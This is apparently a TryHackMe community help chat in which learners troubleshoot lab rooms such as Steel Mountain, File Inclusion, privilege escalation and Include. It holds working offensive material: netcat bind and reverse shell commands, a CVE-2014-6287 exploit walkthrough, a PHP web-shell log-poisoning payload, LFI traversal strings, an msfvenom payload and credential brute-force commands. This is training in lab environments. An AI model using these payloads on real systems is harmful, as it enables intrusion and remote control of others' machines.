nope, but in the THM SubDomain Enumeration room task 4 the site view shown does not provide any dictionary file in specific; dnsrecon takes the default wordlist in its directory called namelist.txt, and I checked that in my machine's tool the dnsrecon namelist.txt is available, but it's not taking it as the wordlist like on the site
How did you install dnsrecon or is it the one that come preinstalled (haven't used the tool yet)?
it's on default Kali, I am practicing this like shown in THM
btw, why can't I access acmeitsupport.thm with its DNS? I can only get to the website using the IP address, not via the DNS on the attack box. I need this for accessing the subdomain on the site that is enumerated in the tasks.........
Please I need help capturing flag3 for Local File Inclusion.
Refer the walkthrough blogs
Thank you let me go check it out
Gave +1 Rep to @fleet gate (current: #2066 - 1)
@fleet gate can you send a link pointing to your reference what I came across isn’t looking significant
I’ve done everything but the issue is the .php keeps being appended. I added the null byte but to no avail
it will be good if you send ss with detailed context and which task you are facing this in the room
Task 8, challenge 3
there are several walkthroughs you might see, did you check those out? I can't send the links since it violates the rules
No I didn’t let me check them out
How can I find this keyword from the website server content? I mean, when we sign up with an already existing account this keyword will show up, right? So ffuf knows it already exists and marks the username as a result. But in the website response content for the form I can't see this keyword; it only shows up as "username already existed with this account" in the HTML content. So how does ffuf know this keyword? Does it simply look through the response content from the server (here, HTML) and see if there is any match for the keyword we mentioned?
I am sorry for complicating this. To ask in summary: how does ffuf search for the keyword we mentioned in the -mr flag in the website response?
Will it look through all the HTML element content in the response?
What do you mean its not in the response? It was highlighted in the 2nd image?
It was looking at the website response as you added a filter in your ffuf command, which is -mr (match regex).
okay, cool. Now i understand
thank you
Gave +1 Rep to @prisma raptor (current: #13 - 530)
Set the domain name in your hosts file
"Be cautious with loading huge lists, as it may cause Burp to crash." Out of curiosity, how huge is huge?
140 mb
At the end of 'What the Shell' I'm trying to RDP into the windows server I added a user to, and then added that user to administrators group, but I keep getting errors.
Connecting using xfreerdp from attack box I get the below error after it shows it connects:
connected to 10.10.68.78:3389
SSL_read: I/O error: Connection reset by peer (104)
Found the answer, I had to add the user to the RDP group:
net localgroup "Remote Desktop Users" <username> /add
Room: Steel Mountain
Connection: via Attackbox
Does nc.exe only point to port 80? What if I specify my web server on another port? How can I point nc.exe to another port?
I am using the attackbox and port 80 can't be used for the webserver. If I use a custom port for my webserver, how do I make nc.exe point to my custom webserver port?
You may have to edit the script to reflect the same. However, I wasn't able to make it work, but others might have. Let's wait for them to chime in.
I'm not in the steel mountain room, but I just uploaded a nc.exe to a windows machine in the what the shell room.
All you should have to do is provide the port number after the IP:
nc 10.10.10.10 12345
If that doesn't work, and it's some kind of script, let me know and I'll take a look at the steel mountain room
I got a question about using the GTFOBins python rev shell. The command "socat ..." is run on the attacking machine, and the following code has to be executed on the victim as a bash script? Is that correct?
Did you use the Attackbox on it as well?
Haven't tried this one yet, but it seems so. Will try it when I get the chance and let you know.
No, I use a Kali VM. But if you are using nc.exe it is supposed to be run on a Windows machine, that's what .exe files are for.
The command syntax for nc.exe is the same as nc binaries (linux nc command).
If you are connecting to a windows machine running nc.exe from the attack box this is what you run:
- Have to upload nc.exe to windows machine.
- Run this command on windows server to start nc as listener:
nc.exe -lvnp 12345 -e cmd.exe
- Run this command from Kali to connect to target running the listener:
nc <ip> <port>
That's a bind shell above.
Let me test a reverse shell for nc.exe on a windows machine to verify the exact commands
Just to add context, the challenge here is modifying the script / exploit so that it would fetch the nc.exe binary on a custom port. However, even when updating it (i.e., adding the port number and encoding the additional characters), it doesn't pick up the nc.exe binary on the custom port.
Also, the -e flag only works on certain nc versions so you'll have to check which one to use.
I'll take a look, been awhile since I did that room, but you should post about it in #offensive-pentesting-path because that room is in that path
You're on task 4?
You're not updating the nc at all. You're updating this exploit (https://www.exploit-db.com/exploits/39161) with the target ip and port.
It says under 'EDB Note' : You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
You're using the exploit to copy nc.exe to the victim machine
Yes, you don't have to update the nc. @steep lynx was referring to that note there as the Attackbox uses port 80 and you should host the nc binary in that port. When I tried modifying the exploit to host nc on a non-standard port, it didn't fetch the nc binary in the non-standard port even when hosted in a python3 http.server.
Overall:
- You are running the exploit from the attack box with this command:
python Exploit.py <Target IP address> <Target Port Number>
- Before running that command above you need to be hosting a webserver from your attack box:
sudo python3 -m http.server 80
- You need to be root to access ports below 1024, also, make sure you run that 'python3 -m http.server 80' from the directory that has nc.exe
I don't see anything saying you need to update the exploit.
If you did this is what you would update:
ip_addr = "192.168.44.128" #local IP address
local_port = "443" # Local Port number
Yeah, put your attack box IP and local_port as '80'
Don't forgot to change the Local IP address and Port number on the script"""
Says to do it in the error message at bottom of exploit
the exploit comes with a script to pull the 'nc.exe' file from the webserver you are hosting with this line
vbs = "C:\Users\Public\script.vbs| ......
Try it on the Attackbox and you'll see. 😀
full steps
- Edit exploit lines below with your attack machine IP and port you are using '80':
ip_addr = "192.168.44.128" #local IP address
local_port = "443" # Local Port number
- Have nc.exe in your current working directory
- run command to launch web server:
sudo python3 -m http.server 80
- In separate terminal, continually run the exploit, once to download nc.exe, again to make the reverse shell happen.
python Exploit.py <Target IP address> <Target Port Number>
- It's making the reverse shell with the same port as the web server with the below line, I'm guessing it will just turn your terminal hosting the webserver into a reverse shell, as you can't listen on that same port that is hosting the webserver.
vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
So, keep running the command in step 4 until it works. Wait 15 seconds between commands when you run it.
I'll try it tonight. Have to log off shortly.
The exploit that they link in the room has a bug.
Use this exploit: https://github.com/mrintern/thm_steelmountain_CVE-2014-6287/blob/main/http_fs_exploit.py
Follow the steps I listed above using that exploit. Once you run it once you'll see this:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.215.228 - - [10/May/2024 19:59:56] "GET /nc.exe HTTP/1.1" 200 -
10.10.215.228 - - [10/May/2024 19:59:56] "GET /nc.exe HTTP/1.1" 200 -
10.10.215.228 - - [10/May/2024 19:59:56] "GET /nc.exe HTTP/1.1" 200 -
10.10.215.228 - - [10/May/2024 19:59:56] "GET /nc.exe HTTP/1.1" 200 -
10.10.215.228 - - [10/May/2024 19:59:59] code 400, message Bad request version ('6.3.9600]')
10.10.215.228 - - [10/May/2024 19:59:59] "Microsoft Windows [Version 6.3.9600]" 400 -
10.10.215.228 - - [10/May/2024 19:59:59] code 400, message Bad request version ('6.3.9600]')
10.10.215.228 - - [10/May/2024 19:59:59] code 400, message Bad request version ('6.3.9600]')
You'll keep seeing 'code 400, message Bad request'. That means it got the nc.exe. Kill the webserver and run 'nc' from your attack box.
sudo nc -nlvp 80
Run the exploit again and you'll get in.
I just got in with it. That exploit they link throws a syntax error every time I tried to run it so there is definitely something wrong with it, but the exploit on that github page worked fine.
@prisma raptor I got in, see my explanation above. The exploit they link from THM has a bug, I provided a link to a working exploit.
@prisma raptor This link explains the port 80 situation. I had it left open from last night and read it before I closed it. Apparently the attack box uses port 80 for your connection to it, so you have to host the webserver and do the reverse shell to a different port. 1234 is a basic one to use
https://www.reddit.com/r/tryhackme/comments/rttbse/attackbox_steel_mountain_task_4_python_39161py/
no apparently about it, Attackbox does use port 80.
I was able to do the room without issues as I was using my own VM. It was actually for FryBait and not me. 😅
Hello, can someone help me understand how the SSRF request went through in the room: ssrfqi ?
Task 5: We have to replace one of the avatar selection form item's value with x/../private in order to bypass denylist and access the /private URL
Now I understand that we're tricking the target server by making it seem like the server host is actually sending the request to /private and not from our own computer.
And that we can use tricks like using localhost or similar alternative names to get the server reference
What I don't understand is how x/ is being resolved? Is it just getting ignored in this case? I don't think there is any endpoint /x on the server so I'm confused
If you have any explanation as to how this ssrf attack worked 🙏
Is it just me, or is the "Privilege Escalation: Capabilities" section of the "Linux Privilege Escalation" room very confusing? It very briefly mentions what capabilities are without really saying much. Would have been nice with some explanation about what cap_setuid does and why it can be exploited.
EDIT: Figured it all out in the end, but the task could have benefited from some better explanation.
Maybe this could help -
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities
Hi, I'm new to TryHackMe and struggling with the room "walking an application". I am looking for a directory flag in 'viewing the page source' but don't get the instructions at all.
In the instructions it says I should notice all the external files (css and javascript) are in the same directory. I'm not sure what they are referring to or how to view directories from the source code. Thank you for any help!!
Look in the source, there is a secret link.
okay I clicked on every link, one of them took me to the second answer. But still not able to find the third answer about directories
Ah! That one.
Use a directory browser or burp to site map
okay awesome, can you explain what either of those are? sorry thank you again so much 🙏
Gave +1 Rep to @remote iris (current: #1 - 2276)
Burpsuite is a useful Web app pentest tool.
And a directory browser hits a website with a dictionary to look for other webpages
Gobuster, ffuf.
Hi all!
I am ~40% through the path. Now I wonder if it makes sense to start to practice on some easy machines and which ones are good for starters, like me. Are there any machines that complement the path?
Or would you advise to finish the path first and start practicing afterwards?
Thanks in advance!
Finish the path. There are CTFs at the end that will focus on what you learned.
Allrighty! Thanks 🙂
Gave +1 Rep to @remote iris (current: #1 - 2288)
One question, is there not a little error? Doesn't this only whitelist the numbers from 0-9 without dots? How are you supposed to ping an IP without dots?
"The application will only accept a specific pattern of characters (the digits 0-9)
The application will then only proceed to execute this data which is all numerical."
The pattern on the picture matches/allows any combination of the digits 0-9 with a minimum of one digit. It doesn't match IP addresses.
But since the text says that as well, I assume whoever wrote it is aware of that. Doesn't make much sense in combination with ping, but maybe that's intended, I don't know.
👍
thx
probably only for demonstrational purpose
This is probably way out of scope, but when doing Linux Privilege Escalation room Task 11 - Privilege Escalation: NFS. The compiled C binary would not execute on the victim machine if I compiled it on my Kali machine, but it would if I compiled it on the Attack Box.
The error "./rootShell.out: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./rootShell.out)" seems to indicate a library was missing on the victim required to run it, but the exact same code compiled on the attack box works. I compiled them both with gcc.
Can anyone explain why? And a workaround so I can get a C binary compiled on Kali to work?
Have you compared the versions of gcc on your kali machine and the attackbox? That could be a first indicator. gcc --version
Kali's version: gcc (Debian 13.2.0-23) 13.2.0
Attack box version: gcc (Ubuntu 9.4.0-1ubuntu1~18.04) 9.4.0
I think the victim machine is Ubuntu. Maybe that's it
Pretty sure it's the version difference.
Yeah, that must be it. Thanks!
Although I wonder if it shouldn't be backwards compatible. And you said it doesn't work when compiling with the higher version gcc
This ldd --version | head -n1 should give you the glibc version on each machine
This is using the victim from the next task, but I'd imagine it would be the same version. Also, the command wouldn't work when I ran it in tmux on kali, it just hung and ctrl-c wouldn't even kill it. Had to kill the pane. Which was weird:
victim: ldd (GNU libc) 2.17
kali: ldd (Debian GLIBC 2.37-15) 2.37
attack box: ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27
I know ubuntu is closely related to Debian, so I didn't think that would cause the problem
You could add the flag -static when compiling your binary so it won't have dependency issues.
I'll try that real quick
Another way to solve this is described here - #room-help message
it worked. Thanks!
Good morning everyone. Could someone provide me with a solution to File Inclusion Module, Task 8 (Challenge) > question 3. It would be even better if someone could explain the hint provided in the question. Thanks in advance.
Hello, could someone advise why the flag is not accepted? I'm working on "Walking An Application" Task 3 Q4 "What is the framework flag?" I've worked out the hints and accessed the page: http://10-10-86-74.p.thmlabs.com/thm-framework-login I've got a flag there but it doesn't seem to be accepted by the system. Let me know if I need to provide any additional information.
The flag you tried would be a good start.
You can put text between double pipe symbols to turn it into a ||spoiler||
||THM{CHANGE_DEFAULT_CREDENTIALS}||
I think I figured it out. I was looking at the wrong flag for this question. :S
Hello, in the SQLi room I am facing the same SQL error message over and over even if I change the SQL request. Why is that?
Could sharing the error message and the sql query that causes it potentially help narrow down the issue?
my url: https://website.thm/article?id=1 UNION SELECT 1, 2, 3;
error msg:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1, 2, 3' at line 1
Are you using spaces between 1,2,database() ?
I tried both
Try copy and pasting the exact query they provide.
I tried before and now it's working... sorry for that unnecessary noise... and thank you
Computers sometimes are mysterious
I just finished the nfs task in the linux privilege escalation room, and I don't understand why using nfs is necessary. If the script can simply set the uid to root couldn't I do it manually without any need for file sharing?
As I understand it, the vulnerability we are exploiting in the case is the misconfiguration in how the share was created thus allowing the attacker or us to create a binary and run it in the context of a privileged user (root in this case). Strictly speaking, you could compile the exploit using the low privileged or regular user, but you wouldn't be able to escalate your privileges to root without leveraging the said vulnerability.
Hi! I have a question regarding the following text in the Stored XSS room:
"A blog website that allows users to post comments. Unfortunately, these comments aren't checked for whether they contain JavaScript or filter out any malicious code. If we now post a comment containing JavaScript, this will be stored in the database, and every other user now visiting the article will have the JavaScript run in their browser."
I don't quite get how the code would be executed. If I made a comment containing JS code and it was sent and stored in a database, it would probably be stored as a string or something. Why would it be executed when a user fetches this data?
Let's say the website's html source has a paragraph
<p></p>
When the server dynamically creates the page it puts a user's comment between those tags. If the user now makes a comment like
<script>console.log('xss')</script>
which first gets stored in a database and retrieved whenever someone visits the comments section, what ends up in the html source now is:
<p><script>console.log('xss')</script></p>
And the JavaScript gets executed by the browser as if the developer had put it there originally.
Regarding your "it's just a string": Yes, but all the source code of a website, whether it's html, css or JavaScript is "just a string", all just text. Text which then gets interpreted by the browser.
Okay, I get it now :)! Thanks for a great reply!
Gave +1 Rep to @patent dome (current: #79 - 79)
@prisma raptor But what is the misconfiguration?
The no_root_squash option being on/enabled on the NFS server. https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/security_guide/s2-server-nfs-noroot
@patent dome I see, thank you.
Gave +1 Rep to @patent dome (current: #73 - 84)
You're still on cooldown
Gave 1 Rep to inf0s3cw4nn4b3 (current: #11 - 577)
Hi! I was facing a minor difficulty in the Vulnerabilities Capstone room in the Vulnerability Research module. Should the netcat listener be set up before or after running the exploit python file? If it should be run before, then how can I run the python file without terminating the listener? Thanks
What prevents you from doing both?
Sorry, I didn't understand what you are trying to say. Could you please elaborate ?
Should I upload pics from my AttackBox to make it more clear ?
Ideally yes. I don't quite understand how running the netcat listener prevents you from running a python file in parallel.
In order to share images here you need to verify.
So, does the listener continue to listen even after doing Ctrl+C ?
No, but you can open as many terminals as you want.
And even tabs within one terminal.
Ohh I see. I will try it that way and let you know.
You will very often have to have several terminals open at the same time.
Hi ! How to get past the problem highlighted in red? Module > Metasploit, Room > Metasploit: Exploitation
Is the file where you're calling it?
I have no idea. I have not interacted with any file up to this point in the room
In this question ( Module > Metasploit, Room > Metasploit: Exploitation, Task > Task 5 ), since the session is created and that system has username as Jon, how do I identify as user "pirate" and then use the Metasploit WordList to get the password ? Thanks
You don't have to,
search hashdump in metasploit
Ohh. Thanks for the help
Gave +1 Rep to @remote iris (current: #1 - 2431)
Just finished the File Inclusion room and it was the first to really make my head spin... Took some help from external sources and a little bit of hand holding but I got it!
file inclusion is hard
You should go through it once again. I took notes along and found it easy
There will be a room dedicated to RCE in the path. It’s Command Injection I believe.
I think the reason there is no RCE room is because it can be achieved in a number of ways such as file uploads, command injection, local file inclusion, etc.
I am currently busy with the File Inclusion room, and ooof, I started second-guessing my career choices 🤣
Haven't done the room yet, but was pulling my hair in a challenge room I did which required an RCE via LFI. 😅 I'm still stuck in a couple of LFI challenge rooms, but its fun and frustrating at the same time. Planning to do the File Inclusion room soon myself.
Did you do the Terminator room? Nice way to see RFI in action
I think.. if I have the correct room in mind. 😄
Awesome, do you want to play KoTH?
Oh.. I'm not at that level yet. And haven't been able to touch THM much due to work. 😭
I am in the LFI room, and some of the solutions are not actually taught in the material at all, so........
I have done it all, except RCE. How was I supposed to know ||that I had to edit my username in cookies to be the entire file path?||
My thought process was ||gain admin rights through cookies, then access the file through the POST request||
how do you mean?
I change guest to admin in the cookie, then this shows up.
no error
Hi senseis, I am stuck at LFI challenge 3 and wonder if anyone can give me a hand?
This is completely new to me. I have not learnt burp either.
What I have tried is changing the method from GET to POST in Inspector. And then I input in the form ../../../../etc/flag3%00. I got the warning message with symbols but it's not working...
What if they are badly filtering out ../? What can you change it to so that it would still be turned into ../ after the filtering is done?
Try putting a path in the cookie
I have passed flag 2, but the reasoning behind it isn't clear, or even explained in the course material.
I finished the LFI room. I am doing the include room and I have been stuck for 2 days 🤣
Do you need help ?
Thanks so much for the offering man, allow me to give it another try based on sensei shadow_absorber, just got back from work lol
Gave +1 Rep to @maiden dagger (current: #2111 - 1)
I got the warning message "Warning: include(../../../../etc/flag3%00.php)", but I thought %00 should help filter out the ".php" and I was supposed to get the flag...
yes but that is just part of the filter there is a second part for that flag if shadow recalls correctly
Thanks so much shadow sensei! I tried another method instead of simply playing around with the input form and it works. Kudos to you, thanks
Gave +1 Rep to @sage current (current: #4 - 1785)
I'm having a problem with the path in that I feel there's so much information; you finish with one thing and go to the next immediately.
E.g. once you're done with the Introduction to Web Hacking, you don't really review it all that much and you don't practice it, so it isn't ingrained into memory. I forgot everything...
Is there something that I am missing? I have to redo the entire module and then I'm not sure what to do after.
It gets better with time, just keep doing stuff. You can even reset progress and do it all again, maybe some of it will stick the 2nd or 3rd time you do it.
That's the point of taking notes. You can't remember everything in the rooms. Write it down and it gets better.
Take notes along with screenshots on the Notion App
Revise your notes every morning before starting a new room
Yes, but I'm talking about the practical part,
of actually doing things; that's where I struggle.
You mean the attackboxes?
yes
I always link the writeups for the practical parts to my notes
Most rooms have writeups available on infosec or medium
A lot of times you don't have to know everything. Sometimes it is enough that you have heard about a topic and can google it. In this path you should get a whole overview of the topic and use a few tools to get an understanding of what they do. Don't learn the tools, learn the concepts behind them: what they do and why! Tools will change, concepts stay the same (most of the time).
In the Windows Privilege Escalation room I can't move the reverse shell to the machine. It gives me the error:
```
wget : Unable to connect to the remote server
At line:1 char:1
+ wget http://10.10.119.198:8000/shell
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
```
Have you tried certutil.exe?
No. How do I use that?
Have you tried to do a Google search on it?
Have you tried with the file ending, like http://<ip>:<port>/shell.txt, in your wget command?
Well, I retried it yesterday and it worked without any errors.
Perfect 
In the Windows privilege escalation room I don't understand how these "dangerous" privileges allow privesc on the machine since most seem to be disabled.
hmmmm
you are running the command prompt as administrator
try running it as the normal user
The task says to run as administrator using the given credentials for each account, and the exploits do work. It's just that in the third screenshot, for instance, it is indicated that both the SeBackup and SeRestore privileges are disabled, so how does it work?
you know.... shadow has no idea what is going on here so just gonna leave it to someone else to try and figure out
Okay. Thanks anyway.
Gave +1 Rep to @sage current (current: #4 - 1813)
only thing shadow could guess is running on your host instead of the target machine but that would not make any sense
For Task 7 of Windows Privilege Escalation the syntax of the exploit does not work after modification; it won't allow me to create an account with a password with net user or New-LocalUser, and if I create one without a password I can't run cmd with that user because blank passwords are not allowed. I got the flag by making the command read the contents of flag.txt into a file accessible by thm-unpriv.
Hey guys, I'm having trouble using ffuf in the Authentication Bypass room, Task 3. https://tryhackme.com/r/room/authenticationbypass
When it gets to the brute-force section it only ever tries 1 username (the 2nd listed in the file) across all the different passwords, thus returning no result.
I've looked over the packets using NetworkMiner and it only ever sends POST requests using the admin username (the 2nd username in my valid_usernames.txt file).
First picture is the NetworkMiner results.
The second is the layout of my valid_usernames.txt file
This is the command I'm running too (it is run in the correct directory):
```
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.137.219/customers/login -fc 200
```
Are you running this command in the same directory where you have the valid_usernames.txt?
Yeah I am
And only the admin account is used and not the other ones?
Yeah, it never tests the other usernames.
OK so I did some messing around with my txt file and I just overwrote what it had with the exact same content and it decided to work. I think it had something to do with me appending my ffuf results from the username enumeration into the file messing it up, even after cleaning the data and retyping the entire document.
Thanks for your help nonetheless
Hello, I'm currently blocked in the LinPrivEsc room on Task 11 where we exploit NFS no_root_squash to gain root privileges. When I execute my shell with the SUID bit set I don't get root access but only a shell as karen:
```
$ ls -l
total 44
-rwxr-xr-x 1 root root 16040 Jul 7 09:45 shell
-rw-r--r-- 1 root root 125 Jul 7 09:45 shell.c
-rwsr-sr-x 1 root root 132 Jul 7 09:35 shell.elf
-rwsr-sr-x 1 root root 91 Jul 7 09:48 shell.py
drwx------ 3 root root 4096 Jul 7 09:02 snap.lxd
drwx------ 3 root root 4096 Jul 7 09:02 systemd-private-0e4b35374c0542baab5512e1648690bb-systemd-logind.service-HRYEXf
drwx------ 3 root root 4096 Jul 7 09:02 systemd-private-0e4b35374c0542baab5512e1648690bb-systemd-resolved.service-7ocgCf
drwx------ 3 root root 4096 Jul 7 09:02 systemd-private-0e4b35374c0542baab5512e1648690bb-systemd-timesyncd.service-KRZ5Ue
$ ./shell.elf
karen@ip-10-10-147-138:/tmp$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
```
I generated the shell using msfvenom with `msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfsmount/shell.elf`
because when I execute the C program I compiled I get this error:
```
$ ./shell
./shell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./shell)
```
I also get a karen shell and no root shell if I do it in Python.
My problem is not that I don't succeed in putting a shell on the target, but that when it's executed, even if it is owned by root and has the SUID bit set, it doesn't grant me a root shell.
Who owns shell.elf?
-rwsr-sr-x 1 root root 132 Jul 7 09:35 shell.elf
So what happens when you execute?
```
$ ./shell.elf
karen@ip-10-10-147-138:/tmp$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
```
I got a shell but as karen.
Seems to be the payload. Looking at it closely, your shell.elf simply called /bin/bash -p in your target or victim machine.
However, the /bin/bash binary in your target doesn't have the SUID bit set
Oh I see, so how can I generate a payload with msfvenom that works?
Doesn't the task include the suggested payload?
Or follow the instructions I linked to your message.
I'll follow the message, even if I would like to know how to craft such a payload.
Thanks
Has someone solved the Include challenge? I have the solution but can't flag.
the file inclusion room or the room literally called include???
The room (challenge) called Include
first or second flag???
Second flag
LFI + RCE
Tried with SSH and SMTP log poisoning
This is the question
The room is bugging
I can send php.info
And have a good result
But when I try system.php("ls /var/www/html") for example the site crashes and I don't have any log anymore at /var/log/auth.log
I tried as well on my Kali with exegol through SMTP but nothing is working
I watched some write-ups and it is working for them, so I don't know, I tried many times
Even after restarting/resetting the target machine???
Yes I did it 2 times
Too much unstable
hmmm
Not the first time
it did not feel unstable in testing that is for sure
just to weed out any other problems here is something to try
Tonight I was working with the AttackBox
I was on the AttackBox, so no, the problem is not this
I have been trying to flag it for 2 days
Through exegol it's not working well either
http://MACHINE_IP/profile.php?
img=....//....//....//....//....//....//....//....//....//....//var/log/mail.log&c=ls -lah
And if you have the solution through SMTP feel free to DM me please ;). I tried php.system("cmd") everywhere (FROM, TO, SUBJECT, ETC) and I have never seen the payload in the mail.log
With which payload?
from telnet using this as the payload towards smtp:
Include7MAIL FROM:<test1@tryhackme.com>
RCPT TO:<?php system($_GET['c']); ?>
Not working for RCPT TO; they want Charles, for example
I tried many times
?
OK lets try it tomorrow.
But I tried this payload in MAIL FROM/SUBJECT etc.
Why can't we put this payload in the subject after DATA?
subfect???
Subject
Also there are 2 intended paths that work.... Did you try both???
Sadly it is against the rules for shadow to just hand over the flag even though they got it,
so I will try and help you get it yourself.
More details please
npm log poisoning or the smtp route above
I tried SSH log poisoning and SMTP log poisoning via telnet
Yeah... but those are not npm log poisoning, and you are not doing that over telnet
But I watched a write-up and it is working as well
So what is your advice?
From the website on port 4000?
But how did people solve it through SMTP via telnet and SSH if it is not possible 😅
port 50000 but yeah
SMTP possible, SSH not
Can you show me how it is possible via SMTP (without telnet)? I will send you the commands that I typed during the morning
This website is on port 4000, not 50000, and I used this functionality to become admin.
I tried:
```
EHLO symbole
MAIL TO:thm.local@tryhackme.com
RCPT TO: charles
Data
Subject :<?php system($_GET['cmd']); ?>
Blabla
.
```
In the LFI with &cmd=whoami I don't have any result. I tried to put the payload in the MAIL TO field etc., nothing is working
@sage current
Hi, could anyone please help with the Metasploit: Exploitation room > Task 5.... I understand I'm using the right exploit according to the hint, but the target machine is not vulnerable to ms17_010... Could anyone advise? Thanks in advance...
I don't know why I can't send a screenshot, but what I can tell is that I'm trying to use:
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.###.###:4444
[*] 10.10.175.77:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.10.175.77:445 - Host does NOT appear vulnerable.
[*] 10.10.175.77:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.175.77:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.
```
Question Hint
The target is missing the MS17-010 patch.
@serene gorge
Can you do show options and share the results?
Would this be a good place to continue after the #878393611929129000?
Yes.
alright, thanks again
Gave +1 Rep to @neon geyser (current: #74 - 86)
surely going to buy premium after my finals so I can continue :)
Thank you for replying... I've found the issue... Call me a noob, but I thought that I should use the target VM of Task 2 for all tasks on that page... Just now, as I was going to replicate the error, I saw the green VM symbol on the right side of Task 5... I could complete the task successfully now... Thank you and sorry for disturbing the chat...
Gave +1 Rep to @prisma raptor (current: #11 - 608)
No worries. That's what the purpose of this discord / forum is, help other folks and foster learning.
Hey folks, looks like the File Inclusion room is striking again! I am absolutely stuck on the last question of the challenge "Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?" I'm using the AttackBox and have tried making an http.server in the terminal using sudo python3 -m http.server but I then can't access that server to make my cmd.txt file to force the flag. Any help!? Thanks!
Well, actually you have to visit the challenges directory in particular,
and not the playground directory.
Just visit the "ip/challenges" directory and then you will find the challenges for which you will have to find the flag.
Gaining RCE is not the solution because you will not find anything........ Playground is just for your practice.
As for the last challenge, you can go to the revshells website and copy a simple PHP payload, put it on the website, then open up an nc listener and it will be done.
Oh…. Looks like I was going about it in a much more difficult way. If the Linux on the AttackBox was more up to date, I would have been fine. Couldn't open a sudo http server and open another terminal and have it work within it. It was just opening another terminal under the root user.
I don't think you can create a Python server on the AttackBox.
Or maybe I haven't tried it yet.
What nc listener are you using? -- And should I just go forth and download a VM program and not use the AttackBox? lol
I was going to wait until a little closer to school to go buy my actual laptop for cyber; currently just trying to get knowledge going into schooling using my old gaming laptop.
Just go to revshells and there you will find a PHP payload which will be only 1 line and you can then copy that...... As for the listener, when you visit revshells you will find it there, and then use that to get the flag....... You can use this listener on the AttackBox and it will work completely fine.
Hi, not sure if this is the right channel, so I'm working on the hydra learning path https://tryhackme.com/r/room/hydra and I can't seem to access the web link provided for the exercise: http://machine_ip/
You have to start the machine first, green button.
Whenever you see a link with machine_ip you have to start a machine and the IP will show in 1 minute.
You can only access that webpage while connected to the THM network, either through OpenVPN from your own machine or through the AttackBox.
Anybody here work as a pentester?
Depending on your question, this might be better posted in #infosec-general .
NetSec Room:
question: Where flag?
```
nmap -T2 -ff -Pn -D 10.10.29.29,10.10.169.34,10.10.77.91,ME,10.10.161.201,10.10.68.157 -vv 10.10.29.27
```
command used
I think there was a problem with the scan because there are actually ports open and it didn't see them
So I did many scans now, I also got the ports etc., but it is always on 0%
and it won't give me the flag
and now I'm not even done and it gave me the flag
someone might fix that
For those who have the same problem: if you use the -f(f) switch to fragment the packets it won't work because it may not detect those
Well I just completed this challenge yesterday and this is not what you should be doing
The solution to the last challenge is very simple..... You just need "nmap ip -sN" because the challenge states that you need to get the % as low as possible, so you don't need to ping the host and that's it....
The challenge isn't broken because if you start from the beginning you might probably have scanned the IP and already sent packets to the system and most probably your system did a three-way handshake
You need to reset the packets and you will clearly see the message that the packets were reset, and then you can again do a stealth scan with just the -sN tag and you will get the flag
It said I should evade the IDS of the VM. What I did was to evade the IDS. I had 0% many times even with resetting, reloading etc.
Idk about you, but in the previous rooms we learned about IDS detection prevention
It need not be 0% for this challenge, because when I did the scan it was at 7% but it still gave the flag
That's probably because of the ping
Hi everyone, I am currently working in the Windows Privilege Escalation room on Task 5 and have run into a snag with the Insecure Service Permissions section. I have followed the steps up to restarting the THMService and keep getting this error regardless of what I try to do. Any assistance would be appreciated!
Will check when I get home if no-one can help you first.
@small zodiac Confirmed working with command prompt. Also confirming the need for the .exe file extension in PowerShell.
Was in cmd. Thank you for the response!
Gave +1 Rep to @sour nymph (current: #870 - 4)
Thank you!
np at all.
You're welcome 👍
Thank you for being one of the people that show their solution, I was having the same issue just now 😭 😂
Gave +1 Rep to @serene gorge (current: #2137 - 1)
I have a short question: when using msfvenom to list all payloads with msfvenom -l payloads it shows so many that I can't keep scrolling up beyond the Windows exploits. How can I see the full list?
Under the profile preferences of your terminal you can select unlimited scrollback.
😮 thank you so much!
Hi
Hi, I just completed the Jr. Penetration Tester path. I'm wondering whether I should now pursue the Offensive Penetration Testing path or the Red Teaming path. Which one should I start with?
Greetings, all!
I just finished the LFI/RFI challenges, with some help from the discussion here. The last one was quite clever, which I appreciate greatly!
Thank you for everyone who's participating here!
You can find one of the recommended sequence or order by which to complete the learning paths - #general message
Thanks !
In the room https://tryhackme.com/r/room/fileinc Challenge 2 I changed the cookie value to Admin and I'm getting the following error:
```
Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37
Warning: include() [function.include]: Failed opening 'includes/Admin.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/chall2.php on line 37
```
Check the directory
You are doing the playground challenge, I suppose.
You need to go to the challenges directory to solve the questions.
You can solve the last RFI challenge in the playground.
Thanks for your reply. I am working in challenge 2 http://10.10.240.70/challenges/chall2.php
Gave +1 Rep to @boreal notch (current: #2147 - 1)
Go ahead
And I am getting this message:
```
Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37
